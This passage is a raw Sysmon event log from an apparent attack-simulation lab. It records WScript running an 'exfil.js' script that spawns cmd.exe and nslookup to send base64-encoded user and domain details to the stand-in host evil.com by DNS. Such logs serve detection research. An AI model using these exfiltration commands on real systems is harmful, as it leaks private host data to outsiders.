C:\Users\ADMINI~1\AppData\Local\Temp\2\nlizpow.tmp 2>&1 10341000x8000000000000000202625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.472{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C7-629A-5C41-000000005F02}896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.472{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C7-629A-5C41-000000005F02}896C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.472{2E1864BB-17C7-629A-5C41-000000005F02}8964848C:\Windows\system32\conhost.exe{2E1864BB-17C7-629A-5B41-000000005F02}6000C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.457{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-5C41-000000005F02}896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.441{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.441{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.441{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.441{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.441{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-5B41-000000005F02}6000C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.441{2E1864BB-17A1-629A-783D-000000005F02}55526372C:\Windows\System32\WScript.exe{2E1864BB-17C7-629A-5B41-000000005F02}6000C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.445{2E1864BB-17C7-629A-5B41-000000005F02}6000C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlizpow.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.435{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlzegv.tmpMD5=F6BF968BD6C55CB01B482E390B7AB413,SHA256=D3302028A36B5DF1F677CB3E99C1E635A1E68F78F1338041C9F2CB6A2C5F113B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.388{2E1864BB-17C7-629A-5941-000000005F02}56284036C:\Windows\system32\conhost.exe{2E1864BB-17C7-629A-5A41-000000005F02}5896C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.374{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.374{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.374{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.374{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.374{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-5A41-000000005F02}5896C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.374{2E1864BB-17C7-629A-5841-000000005F02}80127980C:\Windows\system32\cmd.exe{2E1864BB-17C7-629A-5A41-000000005F02}5896C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.379{2E1864BB-17C7-629A-5A41-000000005F02}5896C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C7-629A-5841-000000005F02}8012C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzegv.tmp 2>&1 10341000x8000000000000000202605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.341{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C7-629A-5941-000000005F02}5628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.341{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C7-629A-5941-000000005F02}5628C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000202603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.064{00000000-0000-0000-0000-000000000000}7468<unknown process>-udpfalsefalse127.0.0.1-52902-false127.0.0.1-53domain 354300x8000000000000000202602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.063{00000000-0000-0000-0000-000000000000}7468<unknown process>-udpfalsefalse127.0.0.1-52901-false127.0.0.1-53domain 354300x8000000000000000202601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.062{00000000-0000-0000-0000-000000000000}7468<unknown process>-udptruefalse127.0.0.1-52901-false127.0.0.1-53domain 354300x8000000000000000202600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.062{00000000-0000-0000-0000-000000000000}7468<unknown process>-udpfalsefalse127.0.0.1-52900-false127.0.0.1-53domain 354300x8000000000000000202599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.915{00000000-0000-0000-0000-000000000000}2736<unknown process>-udpfalsefalse127.0.0.1-52898-false127.0.0.1-53domain 354300x8000000000000000202598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.914{00000000-0000-0000-0000-000000000000}2736<unknown process>-udptruefalse127.0.0.1-52898-false127.0.0.1-53domain 354300x8000000000000000202597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.914{00000000-0000-0000-0000-000000000000}2736<unknown process>-udpfalsefalse127.0.0.1-52897-false127.0.0.1-53domain 354300x8000000000000000202596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.764{00000000-0000-0000-0000-000000000000}2604<unknown process>-udpfalsefalse127.0.0.1-52896-false127.0.0.1-53domain 354300x8000000000000000202595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.764{00000000-0000-0000-0000-000000000000}2604<unknown process>-udptruefalse127.0.0.1-52896-false127.0.0.1-53domain 354300x8000000000000000202594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.764{00000000-0000-0000-0000-000000000000}2604<unknown process>-udpfalsefalse127.0.0.1-52895-false127.0.0.1-53domain 10341000x8000000000000000202593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.318{2E1864BB-17C7-629A-5941-000000005F02}56284036C:\Windows\system32\conhost.exe{2E1864BB-17C7-629A-5841-000000005F02}8012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000202592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.763{00000000-0000-0000-0000-000000000000}2604<unknown process>-udptruefalse127.0.0.1-52895-false127.0.0.1-53domain 354300x8000000000000000202591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.320{00000000-0000-0000-0000-000000000000}1700<unknown process>-udptruefalse127.0.0.1-52883-false127.0.0.1-53domain 354300x8000000000000000202590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.192{00000000-0000-0000-0000-000000000000}4484<unknown process>-udpfalsefalse127.0.0.1-52881-false127.0.0.1-53domain 354300x8000000000000000202589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.192{00000000-0000-0000-0000-000000000000}4484<unknown process>-udptruefalse127.0.0.1-52881-false127.0.0.1-53domain 354300x8000000000000000202588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.191{00000000-0000-0000-0000-000000000000}4484<unknown process>-udptruefalse127.0.0.1-52880-false127.0.0.1-53domain 354300x8000000000000000202587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.190{00000000-0000-0000-0000-000000000000}4484<unknown process>-udptruefalse127.0.0.1-52879-false127.0.0.1-53domain 354300x8000000000000000202586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.081{00000000-0000-0000-0000-000000000000}5232<unknown process>-udpfalsefalse127.0.0.1-52878-false127.0.0.1-53domain 354300x8000000000000000202585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.081{00000000-0000-0000-0000-000000000000}5232<unknown process>-udptruefalse127.0.0.1-52878-false127.0.0.1-53domain 354300x8000000000000000202584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.955{00000000-0000-0000-0000-000000000000}7416<unknown process>-udptruefalse127.0.0.1-52875-false127.0.0.1-53domain 354300x8000000000000000202583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.954{00000000-0000-0000-0000-000000000000}7416<unknown process>-udpfalsefalse127.0.0.1-52873-false127.0.0.1-53domain 10341000x8000000000000000202582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.301{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-5941-000000005F02}5628C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.286{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.286{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 